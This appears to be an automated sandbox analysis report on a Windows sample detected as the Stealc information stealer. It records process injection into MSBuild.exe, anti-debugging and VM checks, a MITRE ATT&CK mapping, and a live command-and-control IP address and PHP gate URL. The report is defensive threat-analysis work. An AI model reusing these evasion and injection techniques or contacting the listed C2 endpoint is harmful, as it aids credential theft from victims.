Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\1f13Cs1ogc.exe

API coverage: 4.1 %

Source: C:\Users\user\Desktop\1f13Cs1ogc.exe

Code function: 0_2_00FF9ABF FindFirstFileExW,

0_2_00FF9ABF

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 3_2_00401160 GetSystemInfo,

3_2_00401160

Source: Amcache.hve.7.dr	Binary or memory string: VMware
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.7.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.7.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.7.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.7.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.7.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E64000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.7.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.7.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.7.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.7.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.7.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.7.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E2C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP
Source: Amcache.hve.7.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.7.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.7.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: Amcache.hve.7.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.7.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.7.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.7.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.7.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.7.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.7.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\1f13Cs1ogc.exe

Code function: 0_2_00FE7922 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00FE7922

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 3_2_004045C0 VirtualProtect ?,00000004,00000100,00000000

3_2_004045C0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

3_2_0041C03D

Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: 0_2_00FE2003 mov edi, dword ptr fs:[00000030h]	0_2_00FE2003
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: 0_2_00FFA64C mov eax, dword ptr fs:[00000030h]	0_2_00FFA64C
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: 0_2_01026628 mov eax, dword ptr fs:[00000030h]	0_2_01026628
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: 0_2_00FF0F2E mov ecx, dword ptr fs:[00000030h]	0_2_00FF0F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_00419750 mov eax, dword ptr fs:[00000030h]	3_2_00419750

Source: C:\Users\user\Desktop\1f13Cs1ogc.exe

Code function: 0_2_00FFCC4B GetProcessHeap,

0_2_00FFCC4B

Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: 0_2_00FE7610 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00FE7610
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: 0_2_00FE7922 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00FE7922
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: 0_2_00FE7AAF SetUnhandledExceptionFilter,	0_2_00FE7AAF
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: 0_2_00FEDA73 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00FEDA73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_0041AD48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0041CEEA SetUnhandledExceptionFilter,	3_2_0041CEEA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0041B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_0041B33A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: 1f13Cs1ogc.exe PID: 6352, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 4616, type: MEMORYSTR

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\1f13Cs1ogc.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\1f13Cs1ogc.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 41E000	Jump to behavior
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 42B000	Jump to behavior
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 65C000	Jump to behavior
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: A41008	Jump to behavior

Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior

Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	0_2_00FFC085
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: GetLocaleInfoW,	0_2_00FF622B
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: EnumSystemLocalesW,	0_2_00FFC372
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: EnumSystemLocalesW,	0_2_00FFC327
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_00FFC498
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: EnumSystemLocalesW,	0_2_00FFC40D
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: GetLocaleInfoW,	0_2_00FFC6EB
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_00FFC814
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_00FFC9E9
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: GetLocaleInfoW,	0_2_00FFC91A
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: EnumSystemLocalesW,	0_2_00FF5D7F

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\1f13Cs1ogc.exe

Code function: 0_2_00FE7815 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00FE7815

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 3_2_00417850 GetUserNameA,

3_2_00417850

Source: Amcache.hve.7.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 0.2.1f13Cs1ogc.exe.100dad8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1f13Cs1ogc.exe.100dad8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1f13Cs1ogc.exe.fe0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 4616, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 0.2.1f13Cs1ogc.exe.100dad8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1f13Cs1ogc.exe.100dad8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1f13Cs1ogc.exe.fe0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 4616, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	311 Process Injection	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	12 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Virtualization/Sandbox Evasion	LSASS Memory	41 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Disable or Modify Tools	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	311 Process Injection	NTDS	1 Account Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 System Owner/User Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Obfuscated Files or Information	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Software Packing	DCSync	23 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label
1f13Cs1ogc.exe	32%	ReversingLabs	Win32.Trojan.Generic
1f13Cs1ogc.exe	100%	Avira	HEUR/AGEN.1310458
1f13Cs1ogc.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://upx.sf.net	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bg.microsoft.map.fastly.net	199.232.214.172	true	false	unknown
s-part-0036.t-0009.t-msedge.net	13.107.246.64	true	false	unknown
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://62.204.41.150/	true		unknown
http://62.204.41.150/edd20096ecef326d.php	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://upx.sf.net	Amcache.hve.7.dr	false	URL Reputation: safe	unknown
http://62.204.41.150t	MSBuild.exe, 00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://62.204.41.150	MSBuild.exe, 00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://62.204.41.150/bJ	MSBuild.exe, 00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://62.204.41.150/edd20096ecef326d.php5	MSBuild.exe, 00000003.00000002.2092112900.0000000000E47000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://62.204.41.150/j	MSBuild.exe, 00000003.00000002.2092112900.0000000000E47000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://62.204.41.150~	MSBuild.exe, 00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
62.204.41.150	unknown	United Kingdom		30798	TNNET-ASTNNetOyMainnetworkFI	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1528301
Start date and time:	2024-10-07 18:45:10 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 55s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	1f13Cs1ogc.exe renamed because original name is a hash value
Original Sample Name:	be961e1299e54c9a50c773db0dc3696c.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@8/5@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 97% Number of executed functions: 20 Number of non-executed functions: 66
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.190.160.22, 40.126.32.68, 40.126.32.76, 40.126.32.136, 20.190.160.14, 40.126.32.138, 40.126.32.72, 20.190.160.17, 199.232.214.172, 192.229.221.95, 20.109.210.53, 20.3.187.198, 20.189.173.21, 52.165.164.15, 93.184.221.240
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.afd.azureedge.net, wu.azureedge.net, ocsp.digicert.com, login.live.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, sls.update.microsoft.com, onedsblobprdwus16.westus.cloudapp.azure.com, hlb.apr-52dd2-0.edgecastdns.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, prdv4a.aadg.msidentity.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.azureedge.net, www.tm.v4.a.prd.aadg.akadns.net, wu.ec.azureedge.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, blobcollector.events.data.trafficmanager.net, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
VT rate limit hit for: 1f13Cs1ogc.exe

Simulations

Behavior and APIs

Time	Type	Description
12:46:28	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
62.204.41.150	5rVhexjLCx.exe	Get hash	malicious	Stealc	Browse	62.204.41.150/edd20096ecef326d.php
62.204.41.150	file.exe	Get hash	malicious	Stealc	Browse	62.204.41.150/edd20096ecef326d.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s-part-0036.t-0009.t-msedge.net	VLSiVR4Qxs.exe	Get hash	malicious	LummaC, Vidar	Browse	13.107.246.64
	file.exe	Get hash	malicious	Stealc	Browse	13.107.246.64
	https://fenster-mark-gmbhsharefile.btn-ebikes.com/	Get hash	malicious	Unknown	Browse	13.107.246.64
	gIXLkTvFeC.exe	Get hash	malicious	Vidar	Browse	13.107.246.64
	https://cloud.list.lu/index.php/s/znw4dNSttiDzHTB	Get hash	malicious	Unknown	Browse	13.107.246.64
	https://kohlhage-de.powerappsportals.com/	Get hash	malicious	HtmlDropper	Browse	13.107.246.64
	http://pub-6abf9f4f2e414af1a92f1d0cac9c1674.r2.dev/auth_gen.html	Get hash	malicious	Unknown	Browse	13.107.246.64
	https://www.office365.murnau.org/_/l0g1n0	Get hash	malicious	Unknown	Browse	13.107.246.64
	https://pub-b60bbcf7edd9477a8f686caa270d9f9c.r2.dev/index.html	Get hash	malicious	HTMLPhisher	Browse	13.107.246.64
	Setup.exe	Get hash	malicious	LummaC	Browse	13.107.246.64
fp2e7a.wpc.phicdn.net	NdSXVNeoET.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	192.229.221.95
	VLSiVR4Qxs.exe	Get hash	malicious	LummaC, Vidar	Browse	192.229.221.95
	5rVhexjLCx.exe	Get hash	malicious	Stealc	Browse	192.229.221.95
	https://forms.office.com/Pages/ShareFormPage.aspx?id=W8eUhlA4rUOuklSyoCn21mtmgAvPzYFJuSM99R6gX3dUQ1IyWUM1UUhTS1pWQ0xXNkI3RzlRRkFIVi4u&sharetoken=93tGEOrxpFy3X0nnxFcr	Get hash	malicious	HTMLPhisher	Browse	192.229.221.95
	file.exe	Get hash	malicious	Vidar	Browse	192.229.221.95
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	192.229.221.95
